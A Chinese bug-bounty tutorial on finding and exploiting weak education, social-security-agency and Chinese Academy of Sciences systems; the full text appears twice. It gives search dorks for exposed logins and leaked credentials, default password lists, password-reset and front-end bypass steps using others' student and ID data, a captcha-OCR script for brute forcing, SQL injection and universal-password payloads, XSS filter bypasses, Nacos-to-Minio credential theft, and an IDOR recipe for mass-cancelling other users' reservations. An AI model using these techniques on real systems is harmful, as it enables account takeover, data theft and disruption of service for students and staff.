一文带你看懂从脆弱资产收集到SRC通杀案例技术分享
字数 2602
更新时间 2025-12-30 12:16:24
从脆弱资产收集到SRC通杀案例技术教学文档
0x1 前言
本文从脆弱资产的视角介绍信息收集的思路和方法,重点以EDUSRC资产收集姿势进行分享。同时涵盖人社和中国科学院相关漏洞收集方法、EDU平台收录规则,以及通过语雀公开知识库收集操作手册和账户密码泄露等技巧。后续通过企业SRC的SQL排序注入和云安全Minio渗透测试实战案例,以及EDUSRC通杀漏洞进行详细技术分析。
0x2 脆弱资产收集
一、通过搜索引擎搜索关键字
1. EDU资产收集
核心搜索语法:
site:edu.cn intext:操作手册|使用手册|操作视频|使用视频|演示视频|白皮书
利用价值:
- 操作手册常包含测试账号和密码
- 系统未及时删除测试账号导致漏洞
- EDU常用默认密码:111111、000000、123123、123456、654321、666666、身份证后六位
2. 人社关键字收集
部门范围:
- 人力资源与社会保障部/厅/局(简称人社部/厅/局)
- 管理的学校:技工学校、技师学院
- 确认方法:搜索"学校名称 隶属于"
微信小程序测试关键字:
就业训练、劳动就业服务管理中心、高级技工学校、信息采集、人才培养
劳动保障、社会保险、劳动维权、职业介绍、公共就业、创业、人事
仲裁、社会保险、劳动就业服务局、社会保障中心、城乡居民养老保险中心
人才交流开发中心、劳动监察大队、职业技能鉴定中心、机关服务中心
创业担保贷款基金管理中心、创业指导中心、乡镇劳动就业社会保障服务中心
信息和考试中心
3. 中国科学院关键字
目标域名: ac.cn和cas.cn
搜索语法:
site:ac.cn intext:管理|后台|登陆|用户名|密码|系统|帐号|操作手册|使用手册|操作视频|使用视频|演示视频|白皮书
site:cas.cn intext:管理|后台|登陆|用户名|密码|系统|帐号|操作手册|使用手册|操作视频|使用视频|演示视频|白皮书
二、语雀公开知识库搜索
搜索关键字: 操作手册/使用手册/操作视频/使用视频/演示视频/白皮书
三、SRC资产收集技术
1. Google黑客语法大全
注入漏洞检测:
site:edu.cn inurl:id|aspx|jsp|php|asp
文件上传漏洞:
site:edu.cn inurl:file|load|editor|Files
后台登录入口:
site:edu.cn intext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|手册|admin|login|sys|managetem|password|username
site:edu.cn inurl:login|admin|manage|manager|admin_login|login_admin|system|boss|master
敏感信息搜索:
site:edu.cn ( "默认密码" OR "学号" OR "工号")
site:edu.cn "账号、密码、学号"&"附件"
后台接口探测:
site:edu.cn (inurl:login OR inurl:admin OR inurl:index OR inurl:登录) OR (inurl:config | inurl:env | inurl:setting | inurl:backup | inurl:admin | inurl:php)
特殊文件查找:
site:edu.cn filetype:txt OR filetype:xls OR filetype:xlsx OR filetype:doc OR filetype:docx OR filetype:pdf
漏洞倾向参数分类:
- XSS参数:
inurl:q= | inurl:s= | inurl:search= | inurl:query= | inurl:keyword= | inurl:lang= - 重定向参数:
inurl:url= | inurl:return= | inurl:next= | inurl:redirect= | inurl:redir= - SQL注入参数:
inurl:id= | inurl:pid= | inurl:category= | inurl:cat= | inurl:action= | inurl:sid= - SSRF参数:
inurl:http | inurl:url= | inurl:path= | inurl:dest= | inurl:html= | inurl:data= - LFI参数:
inurl:include | inurl:dir | inurl:detail= | inurl:file= | inurl:folder= - RCE参数:
inurl:cmd | inurl:exec= | inurl:query= | inurl:code= | inurl:do=
FOFA资产收集语法:
org="China Education and Research Network Center" &&("后台"||"登录")&&("中学"||"技术学院"||"小学"||"职业学院"||"中专"||"幼儿园"||"人社局"||"科学院")
2. 自动化工具使用
在线平台: https://app.pentest-tools.com/scans/new-scan
- 免费子域名挖掘功能
- Google黑客图形化界面
- 配置文件信息自动查询
0x3 统一身份认证绕过技术
一、GitHub信息收集
搜索技巧:
- 选择代码(Code)标签页
- 按语言筛选:JavaScript和Python为主
- 查找账号密码泄露
二、第三方平台账号获取
渠道: 某宝、某鱼、pdd平台搜索"高校图书馆"
三、实战案例:身份认证绕过
攻击流程:
- 通过操作手册获取管理员账号(xxadmin)
- 尝试密码与账号相同成功登录
- 收集学号/工号和身份证信息
- 访问统一身份认证后台
- 点击忘记密码功能
- 绕过手机验证码验证
绕过技术:
- 拦截返回包修改statusCode为200
- 修改false为true实现前端校验绕过
四、密保问题绕过
常见弱密保:
- 学号作为密保答案 - 通过奖学金名单获取
- 幸运数字 - 通常为0-10,可爆破尝试
五、统一身份认证逻辑缺陷通杀
利用条件: 姓名、学号、身份证信息
漏洞特征: 基础信息验证后直接重置密码,JS分析显示通杀特性
0x4 业务安全漏洞-登录认证实战
验证码绕过技术
工具准备:
- ddddocr库自动识别验证码
- Python脚本搭建识别服务
识别脚本:
# -*- coding:utf-8 -*-
import ddddocr
from aiohttp import web
import base64
ocr = ddddocr.DdddOcr()
auth_base64 = "f0ngauth"
async def handle_cb(request):
if request.headers.get('Authorization') != 'Basic ' + auth_base64:
return web.Response(text='Forbidden', status='403')
img_base64 = await request.text()
img_bytes = base64.b64decode(img_base64)
return web.Response(text=ocr.classification(img_bytes)[0:4])
app = web.Application()
app.add_routes([web.post('/reg', handle_cb)])
if __name__ == '__main__':
web.run_app(app, port=8888)
BurpSuite配置:
- 抓取验证码图片数据包
- 使用ddddocr插件模板
- 设置爆破模式为Pitchfork
- 调整延迟避免触发防护
0x5 企业SRC SQL排序注入
技术原理
- 利用ORDER BY语句的排序功能
- 可控参数:desc/asc排序方向
- SQL语句示例:
SELECT * FROM users ORDER BY 1 desc/asc
检测方法
注入判断payload:
,1
,0
,sleep(5)
,exp(999)
,exp(222)
实战案例
利用payload:
updatexml(1,concat(0x7e,(version()),0x7e),1)
extractvalue(1, concat(0x7e, user(), 0x7e))
updatexml(1, concat(0x7c, @@datadir, 0x7c), 1)
extractvalue(1, concat(0x2a, @@version, 0x2a))
0x6 云安全Minio渗透测试
一、Minio简介
- 开源对象存储系统,兼容AWS S3协议
- 默认端口9000
- 集群模式可能泄露MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD
二、渗透测试流程
入口点: Nacos目录泄露
攻击步骤:
- 尝试弱口令:admin/123456、nacos/nacos
- 使用nacos权限绕过工具添加用户
- 登录Nacos查看yml配置文件
- 获取Minio的access-key和secret-key
- 直接登录Minio管理界面
三、mc工具连接Minio
下载安装:
wget https://dl.minio.org.cn/client/mc/release/linux-amd64/mc
chmod +x ./mc
连接命令:
./mc alias set myminio minio_address access-key secret-key
文件操作:
./mc cp file.txt myminio/bucket/ # 上传
./mc ls myminio/bucket/ # 列表
./mc rm myminio/bucket/file.txt # 删除
0x7 图书馆通杀漏洞案例
一、XSS漏洞绕过技巧
初级测试payload:
<s>test<s>
<h1>test</h1>
标签闭合绕过:
</tExtArEa><h1>123</h1>#
</tExtArEa><s>123#//--+
'"></tExtArEa><s>123#//--+
高级绕过方法:
- 大小写绕过:
<Script>alert(1);</Script> - 双写绕过:
<scrscriptipt>alert(1);</scrscriptipt> - 关键字替换:用confirm、prompt代替alert
- 符号绕过:使用反引号代替单引号,%0a代替空格
二、越权漏洞实战
攻击流程:
- 发现图书馆预约系统
- 尝试弱口令和万能密码未果
- 找到忘记密码功能
- 使用公开的学号姓名信息
- 输入自有手机号重置密码
- 登录系统发现越权漏洞
万能密码payload:
admin'#
admin'or 1=1--
admin'or' 1=1--
admin"or 1=1--
admin'or''='
越权利用:
- 账号A取消预约数据包复用
- 修改id参数取消他人预约
- 批量爆破id实现大规模取消
0x8 技术总结
本文系统性地介绍了从信息收集到漏洞利用的完整链条,重点强调了脆弱资产收集的重要性。通过多维度搜索技巧、身份认证绕过、业务逻辑漏洞挖掘等实战案例,展现了现代渗透测试的技术深度。建议结合实际环境进行练习,将理论知识转化为实战能力。
从脆弱资产收集到SRC通杀案例技术教学文档
0x1 前言
本文从脆弱资产的视角介绍信息收集的思路和方法,重点以EDUSRC资产收集姿势进行分享。同时涵盖人社和中国科学院相关漏洞收集方法、EDU平台收录规则,以及通过语雀公开知识库收集操作手册和账户密码泄露等技巧。后续通过企业SRC的SQL排序注入和云安全Minio渗透测试实战案例,以及EDUSRC通杀漏洞进行详细技术分析。
0x2 脆弱资产收集
一、通过搜索引擎搜索关键字
1. EDU资产收集
核心搜索语法:
site:edu.cn intext:操作手册|使用手册|操作视频|使用视频|演示视频|白皮书
利用价值:
- 操作手册常包含测试账号和密码
- 系统未及时删除测试账号导致漏洞
- EDU常用默认密码:111111、000000、123123、123456、654321、666666、身份证后六位
2. 人社关键字收集
部门范围:
- 人力资源与社会保障部/厅/局(简称人社部/厅/局)
- 管理的学校:技工学校、技师学院
- 确认方法:搜索"学校名称 隶属于"
微信小程序测试关键字:
就业训练、劳动就业服务管理中心、高级技工学校、信息采集、人才培养
劳动保障、社会保险、劳动维权、职业介绍、公共就业、创业、人事
仲裁、社会保险、劳动就业服务局、社会保障中心、城乡居民养老保险中心
人才交流开发中心、劳动监察大队、职业技能鉴定中心、机关服务中心
创业担保贷款基金管理中心、创业指导中心、乡镇劳动就业社会保障服务中心
信息和考试中心
3. 中国科学院关键字
目标域名: ac.cn和cas.cn
搜索语法:
site:ac.cn intext:管理|后台|登陆|用户名|密码|系统|帐号|操作手册|使用手册|操作视频|使用视频|演示视频|白皮书
site:cas.cn intext:管理|后台|登陆|用户名|密码|系统|帐号|操作手册|使用手册|操作视频|使用视频|演示视频|白皮书
二、语雀公开知识库搜索
搜索关键字: 操作手册/使用手册/操作视频/使用视频/演示视频/白皮书
三、SRC资产收集技术
1. Google黑客语法大全
注入漏洞检测:
site:edu.cn inurl:id|aspx|jsp|php|asp
文件上传漏洞:
site:edu.cn inurl:file|load|editor|Files
后台登录入口:
site:edu.cn intext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|手册|admin|login|sys|managetem|password|username
site:edu.cn inurl:login|admin|manage|manager|admin_login|login_admin|system|boss|master
敏感信息搜索:
site:edu.cn ( "默认密码" OR "学号" OR "工号")
site:edu.cn "账号、密码、学号"&"附件"
后台接口探测:
site:edu.cn (inurl:login OR inurl:admin OR inurl:index OR inurl:登录) OR (inurl:config | inurl:env | inurl:setting | inurl:backup | inurl:admin | inurl:php)
特殊文件查找:
site:edu.cn filetype:txt OR filetype:xls OR filetype:xlsx OR filetype:doc OR filetype:docx OR filetype:pdf
漏洞倾向参数分类:
- XSS参数:
inurl:q= | inurl:s= | inurl:search= | inurl:query= | inurl:keyword= | inurl:lang= - 重定向参数:
inurl:url= | inurl:return= | inurl:next= | inurl:redirect= | inurl:redir= - SQL注入参数:
inurl:id= | inurl:pid= | inurl:category= | inurl:cat= | inurl:action= | inurl:sid= - SSRF参数:
inurl:http | inurl:url= | inurl:path= | inurl:dest= | inurl:html= | inurl:data= - LFI参数:
inurl:include | inurl:dir | inurl:detail= | inurl:file= | inurl:folder= - RCE参数:
inurl:cmd | inurl:exec= | inurl:query= | inurl:code= | inurl:do=
FOFA资产收集语法:
org="China Education and Research Network Center" &&("后台"||"登录")&&("中学"||"技术学院"||"小学"||"职业学院"||"中专"||"幼儿园"||"人社局"||"科学院")
2. 自动化工具使用
在线平台: https://app.pentest-tools.com/scans/new-scan
- 免费子域名挖掘功能
- Google黑客图形化界面
- 配置文件信息自动查询
0x3 统一身份认证绕过技术
一、GitHub信息收集
搜索技巧:
- 选择代码(Code)标签页
- 按语言筛选:JavaScript和Python为主
- 查找账号密码泄露
二、第三方平台账号获取
渠道: 某宝、某鱼、pdd平台搜索"高校图书馆"
三、实战案例:身份认证绕过
攻击流程:
- 通过操作手册获取管理员账号(xxadmin)
- 尝试密码与账号相同成功登录
- 收集学号/工号和身份证信息
- 访问统一身份认证后台
- 点击忘记密码功能
- 绕过手机验证码验证
绕过技术:
- 拦截返回包修改statusCode为200
- 修改false为true实现前端校验绕过
四、密保问题绕过
常见弱密保:
- 学号作为密保答案 - 通过奖学金名单获取
- 幸运数字 - 通常为0-10,可爆破尝试
五、统一身份认证逻辑缺陷通杀
利用条件: 姓名、学号、身份证信息
漏洞特征: 基础信息验证后直接重置密码,JS分析显示通杀特性
0x4 业务安全漏洞-登录认证实战
验证码绕过技术
工具准备:
- ddddocr库自动识别验证码
- Python脚本搭建识别服务
识别脚本:
# -*- coding:utf-8 -*-
import ddddocr
from aiohttp import web
import base64
ocr = ddddocr.DdddOcr()
auth_base64 = "f0ngauth"
async def handle_cb(request):
if request.headers.get('Authorization') != 'Basic ' + auth_base64:
return web.Response(text='Forbidden', status='403')
img_base64 = await request.text()
img_bytes = base64.b64decode(img_base64)
return web.Response(text=ocr.classification(img_bytes)[0:4])
app = web.Application()
app.add_routes([web.post('/reg', handle_cb)])
if __name__ == '__main__':
web.run_app(app, port=8888)
BurpSuite配置:
- 抓取验证码图片数据包
- 使用ddddocr插件模板
- 设置爆破模式为Pitchfork
- 调整延迟避免触发防护
0x5 企业SRC SQL排序注入
技术原理
- 利用ORDER BY语句的排序功能
- 可控参数:desc/asc排序方向
- SQL语句示例:
SELECT * FROM users ORDER BY 1 desc/asc
检测方法
注入判断payload:
,1
,0
,sleep(5)
,exp(999)
,exp(222)
实战案例
利用payload:
updatexml(1,concat(0x7e,(version()),0x7e),1)
extractvalue(1, concat(0x7e, user(), 0x7e))
updatexml(1, concat(0x7c, @@datadir, 0x7c), 1)
extractvalue(1, concat(0x2a, @@version, 0x2a))
0x6 云安全Minio渗透测试
一、Minio简介
- 开源对象存储系统,兼容AWS S3协议
- 默认端口9000
- 集群模式可能泄露MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD
二、渗透测试流程
入口点: Nacos目录泄露
攻击步骤:
- 尝试弱口令:admin/123456、nacos/nacos
- 使用nacos权限绕过工具添加用户
- 登录Nacos查看yml配置文件
- 获取Minio的access-key和secret-key
- 直接登录Minio管理界面
三、mc工具连接Minio
下载安装:
wget https://dl.minio.org.cn/client/mc/release/linux-amd64/mc
chmod +x ./mc
连接命令:
./mc alias set myminio minio_address access-key secret-key
文件操作:
./mc cp file.txt myminio/bucket/ # 上传
./mc ls myminio/bucket/ # 列表
./mc rm myminio/bucket/file.txt # 删除
0x7 图书馆通杀漏洞案例
一、XSS漏洞绕过技巧
初级测试payload:
<s>test<s>
<h1>test</h1>
标签闭合绕过:
</tExtArEa><h1>123</h1>#
</tExtArEa><s>123#//--+
'"></tExtArEa><s>123#//--+
高级绕过方法:
- 大小写绕过:
<Script>alert(1);</Script> - 双写绕过:
<scrscriptipt>alert(1);</scrscriptipt> - 关键字替换:用confirm、prompt代替alert
- 符号绕过:使用反引号代替单引号,%0a代替空格
二、越权漏洞实战
攻击流程:
- 发现图书馆预约系统
- 尝试弱口令和万能密码未果
- 找到忘记密码功能
- 使用公开的学号姓名信息
- 输入自有手机号重置密码
- 登录系统发现越权漏洞
万能密码payload:
admin'#
admin'or 1=1--
admin'or' 1=1--
admin"or 1=1--
admin'or''='
越权利用:
- 账号A取消预约数据包复用
- 修改id参数取消他人预约
- 批量爆破id实现大规模取消
0x8 技术总结
本文系统性地介绍了从信息收集到漏洞利用的完整链条,重点强调了脆弱资产收集的重要性。通过多维度搜索技巧、身份认证绕过、业务逻辑漏洞挖掘等实战案例,展现了现代渗透测试的技术深度。建议结合实际环境进行练习,将理论知识转化为实战能力。